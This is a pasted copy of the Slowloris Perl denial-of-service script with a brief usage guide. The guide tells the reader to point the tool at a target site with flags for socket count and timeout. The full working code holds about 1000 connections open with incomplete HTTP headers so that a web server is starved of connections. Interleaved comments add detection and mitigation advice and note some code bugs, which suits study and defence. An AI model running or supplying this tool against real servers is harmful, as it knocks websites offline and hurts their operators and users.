Sumo

slowloris.pl

Apr 2nd, 2012
  1. please note, THIS WILL NOT WORK ON IIS6.0, IIS7.0, lighttpd, nginx, Cherokee, Squid
  2.  
  3. Usage in Backtrack 5
  4. copy #!/usr/bin/perl -w and down>go to home folder>new document>name it slowloris.pl>paste slowloris into it>save>properties>allow executing>open terminal>
  5. "./slowloris.pl -dns www.target.com -port 80 -timeout 10 -num 1000 -tcpto 5"
  6.  
  7. -dns = site to attack
  8. -port = port to attack
  9. -timeout = how often sockets connect
  10. -num = how many sockets
  11. -tcpto = tcp timeout
  12.  
  13. To find out what value to use for -timeout, type "./slowloris.pl -dns www.target.com -port 80 -test"
  14.  
  15. #!/usr/bin/perl -w
  16. use strict;
  17. use IO::Socket::INET;
  18. use IO::Socket::SSL;
  19. use Getopt::Long;
  20. use Config;
  21.  
  22. $SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors
       # With SIGPIPE ignored, a write to a socket the peer has already closed
       # returns failure to the caller instead of terminating the process.
  23.  
  24. print <<EOTEXT;
  25. Sumo Says HI :D and Welcome to Slowloris!
  26. EOTEXT
  27.  
       # Option storage. $host (-dns) is the connection target; $shost, when
       # given, only replaces the value later written into the Host header.
  28. my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );
  29. my ( $cache, $httpready, $method, $ssl, $rand, $tcpto );
       # NOTE(review): $result is assigned but never read in this listing, so a
       # failed option parse is not acted on.
  30. my $result = GetOptions(
  31. 'shost=s' => \$shost,
  32. 'dns=s' => \$host,
  33. 'httpready' => \$httpready,
  34. 'num=i' => \$connections,
  35. 'cache' => \$cache,
  36. 'port=i' => \$port,
  37. 'https' => \$ssl,
  38. 'tcpto=i' => \$tcpto,
  39. 'test' => \$test,
  40. 'timeout=i' => \$timeout,
  41. 'version' => \$version,
  42. );
  43.  
  44. if ($version) {
  45. print "Version 0.7\n";
  46. exit;
  47. }
  48.  
       # No target given: print usage and stop before any socket is opened.
  49. unless ($host) {
  50. print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n";
  51. print "\n\tType 'perldoc $0' for help with options.\n\n";
  52. exit;
  53. }
  54.  
       # Defaults below are applied on a truthiness test, so an explicit 0 is
       # treated the same as an absent flag.
  55. unless ($port) {
  56. $port = 80;
  57. print "Defaulting to port 80.\n";
  58. }
  59.  
  60. unless ($tcpto) {
  61. $tcpto = 5;
  62. print "Defaulting to a 5 second tcp connection timeout.\n";
  63. }
  64.  
       # Outside -test mode the interval defaults to 100 seconds and the socket
       # count to 1000. For defenders these are the values an unmodified run
       # shows: on the order of 1000 concurrent connections from one source,
       # each written to once per 100 seconds.
  65. unless ($test) {
  66. unless ($timeout) {
  67. $timeout = 100;
  68. print "Defaulting to a 100 second re-try timeout.\n";
  69. }
  70. unless ($connections) {
  71. $connections = 1000;
  72. print "Defaulting to 1000 connections.\n";
  73. }
  74. }
  75.  
  76. my $usemultithreading = 0;
       # Thread support is read from the perl build configuration (%Config).
       # NOTE(review): `use` is processed at compile time, so the two `use`
       # lines inside this block are loaded whether or not the condition holds;
       # the branch only controls the flag and the message. On a perl built
       # without thread support the else branch may therefore never be reached
       # - confirm.
  77. if ( $Config{usethreads} ) {
  78. print "Multithreading enabled.\n";
  79. $usemultithreading = 1;
  80. use threads;
  81. use threads::shared;
  82. }
  83. else {
  84. print "No multithreading capabilites found!\n";
  85. print "Slowloris will be slower than normal as a result.\n";
  86. }
  87.  
       # Counters declared with the `: shared` attribute so worker threads update
       # the same values. Nothing in this listing takes a lock around the
       # updates, so under threads the totals are best read as approximate.
       # $connectioncount is declared but not referenced again in this listing.
  88. my $packetcount : shared = 0;
  89. my $failed : shared = 0;
  90. my $connectioncount : shared = 0;
  91.  
       # The RNG is seeded only when -cache is set; rand() then supplies the
       # random query string appended to the request path.
  92. srand() if ($cache);
  93.  
       # Value for the Host header: -shost if supplied, otherwise the connection
       # target. The header can therefore name a different host than the one
       # the socket is connected to.
  94. if ($shost) {
  95. $sendhost = $shost;
  96. }
  97. else {
  98. $sendhost = $host;
  99. }
       # -httpready switches the verb used by doconnections from GET to POST, so
       # a detection rule keyed to one method alone would not cover both modes.
  100. if ($httpready) {
  101. $method = "POST";
  102. }
  103. else {
  104. $method = "GET";
  105. }
  106.  
  107. if ($test) {
       # -test mode: a single-connection probe. It opens one socket, sends an
       # unterminated request header, then waits 2, 30, 90, 240 and 500 seconds
       # in turn, writing one extra header line after each wait and recording
       # the longest wait after which the write still succeeded.
       # Defender view: what this measures is, in effect, how long the server
       # tolerates silence between header lines. That server-side header read
       # timeout (for Apache, mod_reqtimeout's RequestReadTimeout) is the
       # setting to tighten.
  108. my @times = ( "2", "30", "90", "240", "500" );
  109. my $totaltime = 0;
  110. foreach (@times) {
  111. $totaltime = $totaltime + $_;
  112. }
  113. $totaltime = $totaltime / 60;
  114. print "This test could take up to $totaltime minutes.\n";
  115.  
  116. my $delay = 0;
  117. my $working = 0;
  118. my $sock;
  119.  
       # Connect once, over TLS when -https was given, otherwise plain TCP.
       # $tcpto bounds the connect attempt.
  120. if ($ssl) {
  121. if (
  122. $sock = new IO::Socket::SSL(
  123. PeerAddr => "$host",
  124. PeerPort => "$port",
  125. Timeout => "$tcpto",
  126. Proto => "tcp",
  127. )
  128. )
  129. {
  130. $working = 1;
  131. }
  132. }
  133. else {
  134. if (
  135. $sock = new IO::Socket::INET(
  136. PeerAddr => "$host",
  137. PeerPort => "$port",
  138. Timeout => "$tcpto",
  139. Proto => "tcp",
  140. )
  141. )
  142. {
  143. $working = 1;
  144. }
  145. }
  146. if ($working) {
  147. if ($cache) {
  148. $rand = "?" . int( rand(99999999999999) );
  149. }
  150. else {
  151. $rand = "";
  152. }
       # The header block stops after Content-Length with a single CRLF; the
       # blank line that would complete the request is not sent here, and no
       # body follows the declared Content-Length in this listing. The verb is
       # hard-coded to GET in this probe regardless of -httpready.
       # The User-Agent is a fixed string whose ".NET CLR 2.0.503l3" token
       # contains a lowercase letter l, a stable string to match on in
       # captures or server-side inspection.
  153. my $primarypayload =
  154. "GET /$rand HTTP/1.1\r\n"
  155. . "Host: $sendhost\r\n"
  156. . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
  157. . "Content-Length: 42\r\n";
  158. if ( print $sock $primarypayload ) {
  159. print "Connection successful, now comes the waiting game...\n";
  160. }
  161. else {
  162. print
  163. "That's odd - I connected but couldn't send the data to $host:$port.\n";
  164. print "Is something wrong?\nDying.\n";
  165. exit;
  166. }
  167. }
  168. else {
  169. print "Uhm... I can't connect to $host:$port.\n";
  170. print "Is something wrong?\nDying.\n";
  171. exit;
  172. }
       # One wait-then-write step per entry in @times. A failed write is
       # reported but the loop continues with the next, longer wait.
  173. for ( my $i = 0 ; $i <= $#times ; $i++ ) {
  174. print "Trying a $times[$i] second delay: \n";
  175. sleep( $times[$i] );
  176. if ( print $sock "X-a: b\r\n" ) {
  177. print "\tWorked.\n";
  178. $delay = $times[$i];
  179. }
  180. else {
       # NOTE(review): this tests whether a __WARN__ handler is installed; none
       # is set anywhere in this listing, so the early exit from the loop does
       # not appear reachable.
  181. if ( $SIG{__WARN__} ) {
  182. $delay = $times[ $i - 1 ];
  183. last;
  184. }
  185. print "\tFailed after $times[$i] seconds.\n";
  186. }
  187. }
  188.  
       # Only here is the header block terminated (CRLF CRLF). Both branches
       # print the recommended value and exit.
  189. if ( print $sock "Connection: Close\r\n\r\n" ) {
  190. print "Okay that's enough time. Slowloris closed the socket.\n";
  191. print "Use $delay seconds for -timeout.\n";
  192. exit;
  193. }
  194. else {
  195. print "Remote server closed socket.\n";
  196. print "Use $delay seconds for -timeout.\n";
  197. exit;
  198. }
       # NOTE(review): both branches above call exit, so this block is never
       # reached in the code as shown.
  199. if ( $delay < 166 ) {
  200. print <<EOSUCKS2BU;
  201. Since the timeout ended up being so small ($delay seconds) and it generally
  202. takes between 200-500 threads for most servers and assuming any latency at
  203. all... you might have trouble using Slowloris against this target. You can
  204. tweak the -timeout flag down to less than 10 seconds but it still may not
  205. build the sockets in time.
  206. EOSUCKS2BU
  207. }
  208. }
  209. else {
       # Normal mode: announce the parameters, then hand off to the threaded
       # launcher when threads are available, otherwise run one worker loop in
       # the main thread.
  210. print
  211. "Connecting to $host:$port every $timeout seconds with $connections sockets:\n";
  212.  
  213. if ($usemultithreading) {
  214. domultithreading($connections);
  215. }
  216. else {
  217. doconnections( $connections, $usemultithreading );
  218. }
  219. }
  220.  
  221. sub doconnections {
       # Worker loop: keeps $num sockets to $host:$port open and never returns.
       # Each pass of the while(1) loop (a) opens a socket for every slot not
       # marked working and writes an unterminated request header to it,
       # (b) writes one more header line, "X-a: b", to every working socket,
       # then (c) sleeps $timeout seconds.
       #
       # Parameters: $num - number of socket slots (indexed 1..$num; index 0 is
       # unused); $usemultithreading - unpacked but not read in this body.
       # Reads the file-level $ssl, $host, $port, $tcpto, $cache, $method,
       # $sendhost and $timeout; updates the shared $packetcount and $failed.
       #
       # Defender view: on the wire each connection is a request whose header
       # block never ends with a blank line, extended by an identical "X-a: b"
       # line at a fixed interval. Many such connections from one source, held
       # in the header-read state, are the pattern to alert on. Per-source
       # connection limits and a header read timeout bound the effect.
  222. my ( $num, $usemultithreading ) = @_;
  223. my ( @first, @sock, @working );
       # Per-pass failure tally; counted below but never printed or returned in
       # this listing.
  224. my $failedconnections = 0;
  225. $working[$_] = 0 foreach ( 1 .. $num ); #initializing
  226. $first[$_] = 0 foreach ( 1 .. $num ); #initializing
  227. while (1) {
  228. $failedconnections = 0;
  229. print "\t\tBuilding sockets.\n";
       # Phase 1: (re)open every slot that is not currently marked working.
  230. foreach my $z ( 1 .. $num ) {
  231. if ( $working[$z] == 0 ) {
  232. if ($ssl) {
       # Unlike the plain-TCP branch below, the TLS branch does not add to
       # $packetcount on a successful connect.
  233. if (
  234. $sock[$z] = new IO::Socket::SSL(
  235. PeerAddr => "$host",
  236. PeerPort => "$port",
  237. Timeout => "$tcpto",
  238. Proto => "tcp",
  239. )
  240. )
  241. {
  242. $working[$z] = 1;
  243. }
  244. else {
  245. $working[$z] = 0;
  246. }
  247. }
  248. else {
  249. if (
  250. $sock[$z] = new IO::Socket::INET(
  251. PeerAddr => "$host",
  252. PeerPort => "$port",
  253. Timeout => "$tcpto",
  254. Proto => "tcp",
  255. )
  256. )
  257. {
  258. $working[$z] = 1;
  259. $packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK
  260. }
  261. else {
  262. $working[$z] = 0;
  263. }
  264. }
  265. if ( $working[$z] == 1 ) {
       # With -cache, a random numeric query string makes each request path
       # differ.
  266. if ($cache) {
  267. $rand = "?" . int( rand(99999999999999) );
  268. }
  269. else {
  270. $rand = "";
  271. }
       # The header block ends after Content-Length with a single CRLF, so the
       # request is never completed by this write. The fixed User-Agent carries
       # the ".NET CLR 2.0.503l3" token (lowercase letter l), a stable string to
       # match on.
  272. my $primarypayload =
  273. "$method /$rand HTTP/1.1\r\n"
  274. . "Host: $sendhost\r\n"
  275. . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
  276. . "Content-Length: 42\r\n";
  277. my $handle = $sock[$z];
  278. if ($handle) {
  279. print $handle "$primarypayload";
       # NOTE(review): this tests whether a __WARN__ handler is installed, not
       # whether the print above failed. No handler is set anywhere in this
       # listing, so the failure branch does not appear reachable and the
       # write's return value goes unchecked.
  280. if ( $SIG{__WARN__} ) {
  281. $working[$z] = 0;
  282. close $handle;
  283. $failed++;
  284. $failedconnections++;
  285. }
  286. else {
  287. $packetcount++;
  288. $working[$z] = 1;
  289. }
  290. }
  291. else {
  292. $working[$z] = 0;
  293. $failed++;
  294. $failedconnections++;
  295. }
  296. }
  297. else {
  298. $working[$z] = 0;
  299. $failed++;
  300. $failedconnections++;
  301. }
  302. }
  303. }
  304. print "\t\tSending data.\n";
       # Phase 2: write one more header line to every working socket. A failed
       # write marks the slot not working, so phase 1 of the next pass reopens
       # it.
  305. foreach my $z ( 1 .. $num ) {
  306. if ( $working[$z] == 1 ) {
  307. if ( $sock[$z] ) {
  308. my $handle = $sock[$z];
  309. if ( print $handle "X-a: b\r\n" ) {
  310. $working[$z] = 1;
  311. $packetcount++;
  312. }
  313. else {
  314. $working[$z] = 0;
  315. #debugging info
  316. $failed++;
  317. $failedconnections++;
  318. }
  319. }
  320. else {
  321. $working[$z] = 0;
  322. #debugging info
  323. $failed++;
  324. $failedconnections++;
  325. }
  326. }
  327. }
       # Phase 3: report the shared write counter, then idle for $timeout
       # seconds. This sleep sets the fixed interval between header lines that
       # each connection shows.
  328. print
  329. "Current stats:\tSlowloris has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n";
  330. sleep($timeout);
  331. }
  332. }
  333.  
  334. sub domultithreading {
       # Starts worker threads that each run doconnections with a fixed 50
       # socket slots, one thread per 50 requested connections, rounded up. The
       # real socket total is therefore a multiple of 50: the default
       # -num 1000 yields 20 threads, and any value from 1 to 50 yields one
       # thread with 50 slots.
       #
       # Parameter: $num - requested number of connections.
  335. my ($num) = @_;
       # @thrs is indexed by the running connection count (0, 50, 100, ...), so
       # most slots stay undef; the handles are not used again in this sub.
  336. my @thrs;
  337. my $i = 0;
  338. my $connectionsperthread = 50;
  339. while ( $i < $num ) {
  340. $thrs[$i] =
  341. threads->create( \&doconnections, $connectionsperthread, 1 );
  342. $i += $connectionsperthread;
  343. }
       # NOTE(review): the thread list is captured once and never refreshed, so
       # the loop condition cannot change inside the loop. With two or more
       # threads it spins indefinitely resetting the shared $failed counter
       # (which is not reported anywhere in this listing); with exactly one
       # thread it is skipped and the sub returns.
  344. my @threadslist = threads->list();
  345. while ( $#threadslist > 0 ) {
  346. $failed = 0;
  347. }
  348. }
  349.  
  350. __END__